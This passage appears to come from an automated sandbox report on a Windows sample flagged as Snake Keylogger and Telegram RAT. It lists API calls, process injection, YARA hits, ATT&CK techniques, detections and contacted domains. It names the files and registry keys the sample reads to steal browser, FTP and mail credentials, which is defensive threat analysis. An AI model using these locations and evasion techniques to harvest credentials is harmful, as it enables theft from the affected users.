              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_00405EC2 FindFirstFileA,FindClose,1_2_00405EC2
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004054EC
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_00402671 FindFirstFileA,1_2_00402671
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_00404A29 FindFirstFileExW,2_2_00404A29
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0040446F
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_004067FE GetProcessHeap,2_2_004067FE
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_7333B472 mov eax, dword ptr fs:[00000030h]1_2_7333B472
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_7333B737 mov eax, dword ptr fs:[00000030h]1_2_7333B737
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_7333B776 mov eax, dword ptr fs:[00000030h]1_2_7333B776
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_7333B7B4 mov eax, dword ptr fs:[00000030h]1_2_7333B7B4
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_7333B686 mov eax, dword ptr fs:[00000030h]1_2_7333B686
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_004035F1 mov eax, dword ptr fs:[00000030h]2_2_004035F1
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_047FD308 LdrInitializeThunk,2_2_047FD308
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_00401E1D SetUnhandledExceptionFilter,2_2_00401E1D
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0040446F
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00401C88
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00401F30

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              .NET source code references suspicious native API functionsShow sources
              Source: 2.2.GU#U00cdA DE CARGA...exe.4830000.5.unpack, ?u060c??ufffd/?ufffdu060c??.csReference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
              Source: 2.2.GU#U00cdA DE CARGA...exe.4830000.5.unpack, ufffdu061d???/B??ufffd?.csReference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeMemory written: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeProcess created: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe 'C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe' Jump to behavior
              Source: GU#U00cdA DE CARGA...exe, 00000002.00000002.523744753.0000000000CB0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: GU#U00cdA DE CARGA...exe, 00000002.00000002.523744753.0000000000CB0000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: GU#U00cdA DE CARGA...exe, 00000002.00000002.523744753.0000000000CB0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
              Source: GU#U00cdA DE CARGA...exe, 00000002.00000002.523744753.0000000000CB0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
              Source: GU#U00cdA DE CARGA...exe, 00000002.00000002.523744753.0000000000CB0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_0040208D cpuid 2_2_0040208D
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 2_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00401B74
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeCode function: 1_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_0040312A

              Stealing of Sensitive Information:

              barindex
              Yara detected Snake KeyloggerShow sources
              Source: Yara matchFile source: 2.1.GU#U00cdA DE CARGA...exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e800000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.674a90.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.47b0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.GU#U00cdA DE CARGA...exe.415058.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.3295530.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.674a90.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e811458.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.47b0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.4830000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.415058.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.3295530.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e800000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.415058.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.GU#U00cdA DE CARGA...exe.415058.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e811458.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.522534689.0000000000659000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.525193747.0000000003291000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.525573044.0000000004832000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000001.270799123.0000000000414000.00000040.00020000.sdmp, type: MEMORY
              Yara detected Telegram RATShow sources
              Source: Yara matchFile source: 2.1.GU#U00cdA DE CARGA...exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e800000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.674a90.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.47b0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.GU#U00cdA DE CARGA...exe.415058.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.3295530.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.674a90.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e811458.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.47b0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.4830000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.415058.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.3295530.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e800000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.415058.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.GU#U00cdA DE CARGA...exe.415058.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e811458.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.522534689.0000000000659000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.525193747.0000000003291000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.525573044.0000000004832000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000001.270799123.0000000000414000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: GU#U00cdA DE CARGA...exe PID: 2848, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: GU#U00cdA DE CARGA...exe PID: 400, type: MEMORYSTR
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\GU#U00cdA DE CARGA...exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: Yara matchFile source: 2.1.GU#U00cdA DE CARGA...exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e800000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.674a90.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.47b0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.GU#U00cdA DE CARGA...exe.415058.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.3295530.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.674a90.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e811458.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.47b0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.4830000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.415058.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.3295530.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e800000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.415058.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.GU#U00cdA DE CARGA...exe.415058.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e811458.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.522534689.0000000000659000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.525193747.0000000003291000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.525573044.0000000004832000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000001.270799123.0000000000414000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: GU#U00cdA DE CARGA...exe PID: 2848, type: MEMORYSTR

              Remote Access Functionality:

              barindex
              Yara detected Snake KeyloggerShow sources
              Source: Yara matchFile source: 2.1.GU#U00cdA DE CARGA...exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e800000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.674a90.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.47b0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.GU#U00cdA DE CARGA...exe.415058.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.3295530.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.674a90.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e811458.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.47b0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.4830000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.415058.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.3295530.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e800000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.415058.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.GU#U00cdA DE CARGA...exe.415058.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e811458.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.522534689.0000000000659000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.525193747.0000000003291000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.525573044.0000000004832000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000001.270799123.0000000000414000.00000040.00020000.sdmp, type: MEMORY
              Yara detected Telegram RATShow sources
              Source: Yara matchFile source: 2.1.GU#U00cdA DE CARGA...exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e800000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.674a90.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.47b0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.GU#U00cdA DE CARGA...exe.415058.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.3295530.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.674a90.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e811458.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.47b0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.4830000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.415058.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.3295530.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e800000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.GU#U00cdA DE CARGA...exe.415058.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.GU#U00cdA DE CARGA...exe.415058.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.GU#U00cdA DE CARGA...exe.e811458.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.522534689.0000000000659000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.525193747.0000000003291000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.522080443.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.525573044.0000000004832000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000001.270799123.0000000000414000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: GU#U00cdA DE CARGA...exe PID: 2848, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: GU#U00cdA DE CARGA...exe PID: 400, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection112Disable or Modify Tools1OS Credential Dumping2System Time Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
              Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection112LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSRemote System Discovery1Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing31LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery26Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              GU#U00cdA DE CARGA...exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\nsk2A27.tmp\sbolbwplhfo.dll100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\nsk2A27.tmp\sbolbwplhfo.dll9%ReversingLabsWin32.Trojan.InjectorX

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              2.1.GU#U00cdA DE CARGA...exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
              1.2.GU#U00cdA DE CARGA...exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
              1.0.GU#U00cdA DE CARGA...exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
              2.2.GU#U00cdA DE CARGA...exe.4830000.5.unpack100%AviraTR/Spy.GenDownload File
              2.2.GU#U00cdA DE CARGA...exe.400000.1.unpack100%AviraTR/Dropper.GenDownload File
              2.0.GU#U00cdA DE CARGA...exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

              Domains

              SourceDetectionScannerLabelLink
              freegeoip.app3%VirustotalBrowse
              checkip.dyndns.com0%VirustotalBrowse
              checkip.dyndns.org1%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://checkip.dyndns.org40%URL Reputationsafe
              https://freegeoip.app/xml/0%URL Reputationsafe
              http://checkip.dyndns.org/0%URL Reputationsafe
              http://checkip.dyndns.org/q0%URL Reputationsafe
              https://freegeoip.app/xml/185.189.150.720%Avira URL Cloudsafe
              https://freegeoip.app0%URL Reputationsafe
              http://checkip.dyndns.org0%URL Reputationsafe
              https://freegeoip.app40%URL Reputationsafe
              http://checkip.dyndns.com0%VirustotalBrowse
              http://checkip.dyndns.com0%Avira URL Cloudsafe
              http://freegeoip.app0%URL Reputationsafe
              https://freegeoip.app/xml/185.189.150.72x0%Avira URL Cloudsafe
              http://checkip.dyndns.orgD80%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              freegeoip.app
              		104.21.19.200
              		truefalseunknown
              checkip.dyndns.com
              		216.146.43.70
              		truefalseunknown
              checkip.dyndns.org
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://checkip.dyndns.org/false
              • URL Reputation: safe
              		unknown
              https://freegeoip.app/xml/185.189.150.72false
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://checkip.dyndns.org4GU#U00cdA DE CARGA...exe, 00000002.00000002.524448122.0000000002291000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://freegeoip.app/xml/GU#U00cdA DE CARGA...exe, GU#U00cdA DE CARGA...exe, 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://nsis.sf.net/NSIS_ErrorGU#U00cdA DE CARGA...exefalse
                		high
                https://api.telegram.org/botGU#U00cdA DE CARGA...exe, GU#U00cdA DE CARGA...exe, 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmpfalse
                  		high
                  http://checkip.dyndns.org/qGU#U00cdA DE CARGA...exe, 00000001.00000002.274533096.000000000E800000.00000004.00000001.sdmp, GU#U00cdA DE CARGA...exe, 00000002.00000002.525379203.00000000047B0000.00000004.00020000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://freegeoip.appGU#U00cdA DE CARGA...exe, 00000002.00000002.524828166.0000000002337000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://checkip.dyndns.orgGU#U00cdA DE CARGA...exe, 00000002.00000002.524448122.0000000002291000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://freegeoip.app4GU#U00cdA DE CARGA...exe, 00000002.00000002.524828166.0000000002337000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://checkip.dyndns.comGU#U00cdA DE CARGA...exe, 00000002.00000002.524828166.0000000002337000.00000004.00000001.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://nsis.sf.net/NSIS_ErrorErrorGU#U00cdA DE CARGA...exefalse
                    		high
